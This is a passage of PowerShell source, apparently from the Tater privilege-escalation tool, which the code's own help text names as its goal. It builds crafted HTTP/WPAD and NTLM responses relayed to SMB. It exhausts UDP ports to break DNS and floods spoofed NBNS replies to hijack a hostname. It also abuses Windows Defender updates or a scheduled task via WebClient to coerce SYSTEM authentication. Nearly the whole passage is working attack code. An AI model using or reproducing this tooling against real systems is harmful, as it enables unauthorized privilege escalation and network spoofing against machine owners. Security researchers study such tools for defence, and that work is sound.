$tater.console_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay " + "authentication failed for $HTTP_NTLM_domain_string\" + "$HTTP_NTLM_user_string on $SMBRelayTarget")
|
||
|
$tater.SMB_relay_active_step = 0
|
||
|
$SMB_relay_socket.Close()
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$NTLM = 'NTLM'
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$HTTP_timestamp = Get-Date -format r
|
||
|
$HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
|
||
|
|
||
|
$HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,
|
||
|
0x74,0x65,0x3a,0x20
|
||
|
|
||
|
if($NTLM)
|
||
|
{
|
||
|
$NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
|
||
|
|
||
|
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
|
||
|
$tater.response_StatusCode +
|
||
|
0x20 +
|
||
|
$HTTP_response_phrase +
|
||
|
0x0d,0x0a,0x43,0x61,0x63,0x68,0x65,0x2d,0x43,0x6f,0x6e,0x74,0x72,0x6f,0x6c,0x3a,
|
||
|
0x20,0x70,0x72,0x69,0x76,0x61,0x74,0x65,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
|
||
|
0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,
|
||
|
0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,
|
||
|
0x0d,0x0a,0x45,0x78,0x70,0x69,0x72,0x65,0x73,0x3a,0x20,0x4d,0x6f,0x6e,0x2c,0x20,
|
||
|
0x30,0x31,0x20,0x4a,0x61,0x6e,0x20,0x30,0x30,0x30,0x31,0x20,0x30,0x30,0x3a,0x30,
|
||
|
0x30,0x3a,0x30,0x30,0x20,0x47,0x4d,0x54,0x0d,0x0a +
|
||
|
$HTTP_WWW_authenticate_header +
|
||
|
$NTLM +
|
||
|
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
|
||
|
0x3a,0x20,0x30,0x0d,0x0a,0x0d,0x0a
|
||
|
}
|
||
|
elseif($HTTP_request_type -eq 'WPAD')
|
||
|
{
|
||
|
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
|
||
|
$tater.response_StatusCode +
|
||
|
0x20 +
|
||
|
$HTTP_response_phrase +
|
||
|
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
|
||
|
0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
|
||
|
0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
|
||
|
0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
|
||
|
$HTTP_content_length_bytes +
|
||
|
0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
|
||
|
0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
|
||
|
0x0a,0x44,0x61,0x74,0x65,0x3a +
|
||
|
$HTTP_timestamp +
|
||
|
0x0d,0x0a,0x0d,0x0a +
|
||
|
$HTTP_WPAD_response
|
||
|
}
|
||
|
elseif($HTTP_request_type -eq 'Redirect')
|
||
|
{
|
||
|
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
|
||
|
$tater.response_StatusCode +
|
||
|
0x20 +
|
||
|
$HTTP_response_phrase +
|
||
|
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
|
||
|
0x3a,0x20,0x30,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,
|
||
|
0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,
|
||
|
0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a +
|
||
|
$HTTP_location +
|
||
|
0x44,0x61,0x74,0x65,0x3a +
|
||
|
$HTTP_timestamp +
|
||
|
0x0d,0x0a,0x0d,0x0a
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x20 +
|
||
|
$tater.response_StatusCode +
|
||
|
0x20 +
|
||
|
$HTTP_response_phrase +
|
||
|
0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,
|
||
|
0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,
|
||
|
0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,
|
||
|
0x2f,0x32,0x2e,0x30,0x0d,0x0a,0x44,0x61,0x74,0x65,0x3a +
|
||
|
$HTTP_timestamp +
|
||
|
0x0d,0x0a,0x0d,0x0a
|
||
|
}
|
||
|
|
||
|
$HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
|
||
|
$HTTP_stream.Flush()
|
||
|
start-sleep -s 1
|
||
|
$tater.request_RawUrl_old = $tater.request_RawUrl
|
||
|
$tater.HTTP_client_handle_old= $tater.HTTP_client.Client.Handle
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$exhaust_UDP_scriptblock =
|
||
|
{
|
||
|
$tater.exhaust_UDP_running = $true
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail")
|
||
|
$UDP_socket_list = New-Object "System.Collections.Generic.List[Net.Sockets.Socket]"
|
||
|
$UDP_failed_ports_list = New-Object "System.Collections.Generic.List[Int]"
|
||
|
$i=0
|
||
|
|
||
|
for ($i = 0; $i -le 65535; $i++)
|
||
|
{
|
||
|
|
||
|
try
|
||
|
{
|
||
|
|
||
|
if ($i -ne 137 -and $i -ne 53)
|
||
|
{
|
||
|
$IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
|
||
|
$UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
|
||
|
$UDP_socket.Bind($IP_end_point)
|
||
|
$UDP_socket_list.Add($UDP_socket)
|
||
|
}
|
||
|
|
||
|
}
|
||
|
catch
|
||
|
{
|
||
|
$UDP_failed_ports_list.Add($i);
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Couldn't bind to UDP port $i")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$tater.UDP_exhaust_success = $false
|
||
|
|
||
|
while (!$tater.UDP_exhaust_success)
|
||
|
{
|
||
|
|
||
|
if(!$suppress_flush_message)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
|
||
|
$suppress_flush_message = $true
|
||
|
}
|
||
|
|
||
|
DnsFlushResolverCache
|
||
|
|
||
|
try
|
||
|
{
|
||
|
[System.Net.Dns]::GetHostEntry("microsoft.com")
|
||
|
}
|
||
|
catch
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked")
|
||
|
$tater.UDP_exhaust_success = $true
|
||
|
break
|
||
|
}
|
||
|
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed")
|
||
|
|
||
|
foreach ($UDP_port in $UDP_failed_ports_list)
|
||
|
{
|
||
|
|
||
|
try
|
||
|
{
|
||
|
$IP_end_point = New-Object System.Net.IPEndpoint([System.Net.IPAddress]::Any,$i)
|
||
|
$UDP_socket = New-Object Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::Udp)
|
||
|
$UDP_socket.Bind($IP_end_point)
|
||
|
$UDP_socket_list.Add($UDP_socket)
|
||
|
$UDP_failed_ports.Remove($UDP_port)
|
||
|
}
|
||
|
catch
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$tater.exhaust_UDP_running = $false
|
||
|
}
|
||
|
|
||
|
$spoofer_scriptblock =
|
||
|
{
|
||
|
param ($IP,$SpooferIP,$Hostname,$NBNSLimit)
|
||
|
|
||
|
$Hostname = $Hostname.ToUpper()
|
||
|
|
||
|
$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
|
||
|
0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
|
||
|
|
||
|
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
|
||
|
$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
|
||
|
$hostname_encoded = $hostname_encoded.Replace("-","")
|
||
|
$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
|
||
|
|
||
|
for ($i=0; $i -lt $hostname_encoded.Count; $i++)
|
||
|
{
|
||
|
|
||
|
if($hostname_encoded[$i] -gt 64)
|
||
|
{
|
||
|
$hostname_bytes[$i] = $hostname_encoded[$i] + 10
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$hostname_bytes[$i] = $hostname_encoded[$i] + 17
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
|
||
|
$hostname_bytes +
|
||
|
0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00 +
|
||
|
([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
|
||
|
0x00,0x00,0x00,0x00
|
||
|
|
||
|
while($tater.exhaust_UDP_running)
|
||
|
{
|
||
|
Start-Sleep -s 2
|
||
|
}
|
||
|
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Flushing DNS resolver cache")
|
||
|
DnsFlushResolverCache
|
||
|
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP")
|
||
|
|
||
|
$send_socket = New-Object System.Net.Sockets.UdpClient(137)
|
||
|
$destination_IP = [System.Net.IPAddress]::Parse($IP)
|
||
|
$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
|
||
|
$send_socket.Connect($destination_point)
|
||
|
|
||
|
while ($tater.running)
|
||
|
{
|
||
|
|
||
|
:NBNS_spoofer_loop while (!$tater.hostname_spoof -and $tater.running)
|
||
|
{
|
||
|
|
||
|
for ($i = 0; $i -lt 255; $i++)
|
||
|
{
|
||
|
|
||
|
for ($j = 0; $j -lt 255; $j++)
|
||
|
{
|
||
|
$NBNS_response_packet[0] = $i
|
||
|
$NBNS_response_packet[1] = $j
|
||
|
$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
|
||
|
|
||
|
if($tater.hostname_spoof -and $NBNSLimit -eq 'Y')
|
||
|
{
|
||
|
break NBNS_spoofer_loop
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
Start-Sleep -m 5
|
||
|
}
|
||
|
|
||
|
$send_socket.Close()
|
||
|
}
|
||
|
|
||
|
$tater_scriptblock =
|
||
|
{
|
||
|
param ($NBNS,$NBNSLimit,$RunTime,$SpooferIP,$Hostname,$HTTPPort)
|
||
|
|
||
|
if($RunTime)
|
||
|
{
|
||
|
$tater_timeout = new-timespan -Minutes $RunTime
|
||
|
$tater_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
|
||
|
}
|
||
|
|
||
|
while ($tater.running)
|
||
|
{
|
||
|
|
||
|
if($tater.trigger -ne 2)
|
||
|
{
|
||
|
|
||
|
try
|
||
|
{
|
||
|
$Hostname_IP = [System.Net.Dns]::GetHostEntry($Hostname).AddressList[0].IPAddressToString
|
||
|
}
|
||
|
catch
|
||
|
{
|
||
|
# Don't need output for this
|
||
|
}
|
||
|
|
||
|
if($Hostname_IP -eq $SpooferIP)
|
||
|
{
|
||
|
|
||
|
if(!$suppress_spoofed_message)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP")
|
||
|
$suppress_spoofed_message = $true
|
||
|
}
|
||
|
|
||
|
if($NBNSLimit -eq 'Y')
|
||
|
{
|
||
|
$tater.hostname_spoof = $true
|
||
|
}
|
||
|
|
||
|
$hostname_spoof = $true
|
||
|
$Hostname_IP = ""
|
||
|
}
|
||
|
elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'Y')
|
||
|
{
|
||
|
$tater.hostname_spoof = $false
|
||
|
$hostname_spoof = $false
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if(!$tater.SMBRelay_success -and $tater.trigger -eq 1)
|
||
|
{
|
||
|
|
||
|
if(Test-Path "C:\Program Files\Windows Defender\MpCmdRun.exe")
|
||
|
{
|
||
|
|
||
|
if(($process_defender.HasExited -or !$process_defender) -and !$tater.SMB_relay_success -and $hostname_spoof)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Running Windows Defender signature update")
|
||
|
$process_defender = Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -Argument SignatureUpdate -WindowStyle Hidden -passthru
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.console_queue.Add("Windows Defender not found")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
elseif(!$tater.SMBRelay_success -and $tater.trigger -eq 2)
|
||
|
{
|
||
|
$service_webclient = Get-Service WebClient
|
||
|
|
||
|
if($service_webclient.Status -eq 'Stopped')
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Starting WebClient service")
|
||
|
Start-Process -FilePath "cmd.exe" -Argument "/C pushd \\live.sysinternals.com\tools" -WindowStyle Hidden -passthru -Wait
|
||
|
}
|
||
|
|
||
|
if($service_webclient.Status -eq 'Running' -and !$tater.task_added -and !$tater.SMBRelay_success)
|
||
|
{
|
||
|
$timestamp_add = (Get-Date).AddMinutes(1)
|
||
|
$timestamp_add_string = $timestamp_add.ToString("HH:mm")
|
||
|
$tater.task = $tater.taskname
|
||
|
|
||
|
if($tater.task_delete)
|
||
|
{
|
||
|
$tater.task += "_"
|
||
|
$tater.task += Get-Random
|
||
|
}
|
||
|
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task)
|
||
|
$process_scheduled_task = "/C schtasks.exe /Create /TN " + $tater.task + " /TR \\127.0.0.1@$HTTPPort\test /SC ONCE /ST $timestamp_add_string /F"
|
||
|
Start-Process -FilePath "cmd.exe" -Argument $process_scheduled_task -WindowStyle Hidden -passthru -Wait
|
||
|
|
||
|
$schedule_service = new-object -com("Schedule.Service")
|
||
|
$schedule_service.connect()
|
||
|
$scheduled_task_list = $schedule_service.getfolder("\").gettasks(1)
|
||
|
|
||
|
$tater.task_added = $false
|
||
|
|
||
|
foreach($scheduled_task in $scheduled_task_list)
|
||
|
{
|
||
|
|
||
|
if($scheduled_task.name -eq $tater.task)
|
||
|
{
|
||
|
$tater.task_added = $true
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
$schedule_service.Quit()
|
||
|
|
||
|
if(!$tater.task_added -and !$tater.SMBRelay_success)
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Adding scheduled task " + $tater.task + " failed")
|
||
|
StopTater
|
||
|
}
|
||
|
|
||
|
}
|
||
|
elseif($tater.task_added -and (Get-Date) -ge $timestamp_add.AddMinutes(2))
|
||
|
{
|
||
|
$tater.console_queue.Add("$(Get-Date -format 's') - Something went wrong with the service")
|
||
|
StopTater
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($tater.SMBRelay_success)
|
||
|
{
|
||
|
Stop-Process -id $process_defender.Id
|
||
|
}
|
||
|
|
||
|
if($RunTime)
|
||
|
{
|
||
|
|
||
|
if($tater_stopwatch.Elapsed -ge $tater_timeout)
|
||
|
{
|
||
|
StopTater
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
Start-Sleep -m 5
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
# HTTP Listener Startup Function
|
||
|
function HTTPListener()
|
||
|
{
|
||
|
|
||
|
if($WPADPort -eq '80')
|
||
|
{
|
||
|
$tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::loopback,$HTTPPort)
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
$tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
|
||
|
}
|
||
|
|
||
|
$tater.HTTP_listener = New-Object System.Net.Sockets.TcpListener $tater.HTTP_endpoint
|
||
|
$tater.HTTP_listener.Start()
|
||
|
$HTTP_runspace = [RunspaceFactory]::CreateRunspace()
|
||
|
$HTTP_runspace.Open()
|
||
|
$HTTP_runspace.SessionStateProxy.SetVariable('tater',$tater)
|
||
|
$HTTP_powershell = [PowerShell]::Create()
|
||
|
$HTTP_powershell.Runspace = $HTTP_runspace
|
||
|
$HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
|
||
|
$HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
|
||
|
$HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
|
||
|
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
|
||
|
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
|
||
|
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument(
|
||
|
$WPADDirectHosts).AddArgument($WPADPort) > $null
|
||
|
$HTTP_powershell.BeginInvoke() > $null
|
||
|
}
|
||
|
|
||
|
# Exhaust UDP Startup Function
|
||
|
function ExhaustUDP()
|
||
|
{
|
||
|
$exhaust_UDP_runspace = [RunspaceFactory]::CreateRunspace()
|
||
|
$exhaust_UDP_runspace.Open()
|
||
|
$exhaust_UDP_runspace.SessionStateProxy.SetVariable('tater',$tater)
|
||
|
$exhaust_UDP_powershell = [PowerShell]::Create()
|
||
|
$exhaust_UDP_powershell.Runspace = $exhaust_UDP_runspace
|
||
|
$exhaust_UDP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
|
||
|
$exhaust_UDP_powershell.AddScript($exhaust_UDP_scriptblock) > $null
|
||
|
$exhaust_UDP_powershell.BeginInvoke() > $null
|
||
|
}
|
||
|
|
||
|
# Spoofer Startup Function
|
||
|
function Spoofer()
|
||
|
{
|
||
|
$spoofer_runspace = [RunspaceFactory]::CreateRunspace()
|
||
|
$spoofer_runspace.Open()
|
||
|
$spoofer_runspace.SessionStateProxy.SetVariable('tater',$tater)
|
||
|
$spoofer_powershell = [PowerShell]::Create()
|
||
|
$spoofer_powershell.Runspace = $spoofer_runspace
|
||
|
$spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
|
||
|
$spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
|
||
|
$spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument(
|
||
|
$Hostname).AddArgument($NBNSLimit) > $null
|
||
|
$spoofer_powershell.BeginInvoke() > $null
|
||
|
}
|
||
|
|
||
|
# Tater Loop Function
|
||
|
function TaterLoop()
|
||
|
{
|
||
|
$tater_runspace = [RunspaceFactory]::CreateRunspace()
|
||
|
$tater_runspace.Open()
|
||
|
$tater_runspace.SessionStateProxy.SetVariable('tater',$tater)
|
||
|
$tater_powershell = [PowerShell]::Create()
|
||
|
$tater_powershell.Runspace = $tater_runspace
|
||
|
$tater_powershell.AddScript($shared_basic_functions_scriptblock) > $null
|
||
|
$tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument(
|
||
|
$RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument(
|
||
|
$HTTPPort) > $null
|
||
|
$tater_powershell.BeginInvoke() > $null
|
||
|
}
|
||
|
|
||
|
# HTTP Server Start
|
||
|
HTTPListener
|
||
|
|
||
|
# Exhaust UDP Start
|
||
|
if($ExhaustUDP -eq 'Y')
|
||
|
{
|
||
|
ExhaustUDP
|
||
|
}
|
||
|
|
||
|
# Spoofer Start
|
||
|
if($NBNS -eq 'Y')
|
||
|
{
|
||
|
Spoofer
|
||
|
}
|
||
|
|
||
|
# Tater Loop Start
|
||
|
TaterLoop
|
||
|
|
||
|
if($tater.console_output)
|
||
|
{
|
||
|
|
||
|
:console_loop while($tater.running -and $tater.console_output)
|
||
|
{
|
||
|
|
||
|
while($tater.console_queue.Count -gt 0)
|
||
|
{
|
||
|
Write-Output($tater.console_queue[0] + $tater.newline)
|
||
|
$tater.console_queue.RemoveRange(0,1)
|
||
|
}
|
||
|
|
||
|
if($tater.console_input)
|
||
|
{
|
||
|
|
||
|
if([Console]::KeyAvailable)
|
||
|
{
|
||
|
$tater.console_output = $false
|
||
|
BREAK console_loop
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
Start-Sleep -m 5
|
||
|
}
|
||
|
|
||
|
if(!$tater.running)
|
||
|
{
|
||
|
Remove-Variable tater -scope global
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
}
|
||
|
#End Invoke-Tater
|
||
|
|
||
|
function Stop-Tater
|
||
|
{
|
||
|
<#
|
||
|
.SYNOPSIS
|
||
|
Stop-Tater will stop Tater before a successful privilege escalation.
|
||
|
#>
|
||
|
if($tater)
|
||
|
{
|
||
|
|
||
|
if($tater.running)
|
||
|
{
|
||
|
Write-Output "$(Get-Date -format 's') - Stopping HTTP listener"
|
||
|
$tater.HTTP_listener.server.blocking = $false
|
||
|
Start-Sleep -s 1
|
||
|
$tater.HTTP_listener.server.Close()
|
||
|
Start-Sleep -s 1
|
||
|
$tater.HTTP_listener.Stop()
|
||
|
$tater.running = $false
|
||
|
|
||
|
if($tater.task_delete -and $tater.task_added)
|
||
|
{
|
||
|
$scheduled_task_deleted = $false
|
||
|
$schedule_service = new-object -com("Schedule.Service")
|
||
|
$schedule_service.connect()
|
||
|
$scheduled_task_folder = $schedule_service.getfolder("\")
|
||
|
$scheduled_task_list = $scheduled_task_folder.gettasks(1)
|
||
|
|
||
|
foreach($scheduled_task in $scheduled_task_list)
|
||
|
{
|
||
|
|
||
|
if($scheduled_task.name -eq $tater.task)
|
||
|
{
|
||
|
$scheduled_task_folder.DeleteTask($scheduled_task.name,0)
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
foreach($scheduled_task in $scheduled_task_list)
|
||
|
{
|
||
|
|
||
|
if($scheduled_task.name -eq $tater.task)
|
||
|
{
|
||
|
$scheduled_task_deleted = $true
|
||
|
}
|
||
|
|
||
|
}
|
||
|
|
||
|
if($scheduled_task_deleted)
|
||
|
{
|
||
|
Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deleted successfully")
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
Write-Output ("$(Get-Date -format 's') - Scheduled task " + $tater.task + " deletion failed, remove manually")
|
||
|
}
|
||
|
|
||
|
}
|
||
|
elseif($tater.task_added)
|
||
|
{
|
||
|
Write-Output ("$(Get-Date -format 's') - Remove scheduled task " + $tater.task + " manually when finished")
|
||
|
}
|
||
|
|
||
|
Write-Output "$(Get-Date -format 's') - Tater has been stopped"
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
Write-Output "Tater isn't running"
|
||
|
}
|
||
|
|
||
|
}
|
||
|
else
|
||
|
{
|
||
|
Write-Output "Tater isn't running"
|
||
|
}
|
||
|
|
||
|
Remove-Variable tater -scope global
|
||
|
}
|
||
|
|
||
|
function Get-Tater
|
||
|
{
|
||
|
<#
|
||
|
.SYNOPSIS
|
||
|
Get-Tater will display queued Tater output.
|
||
|
#>
|
||
|
while($tater.console_queue.Count -gt 0)
|
||
|
{
|
||
|
Write-Output($tater.console_queue[0] + $tater.newline)
|
||
|
$tater.console_queue.RemoveRange(0,1)
|
||
|
}
|
||
|
|
||
|
}
|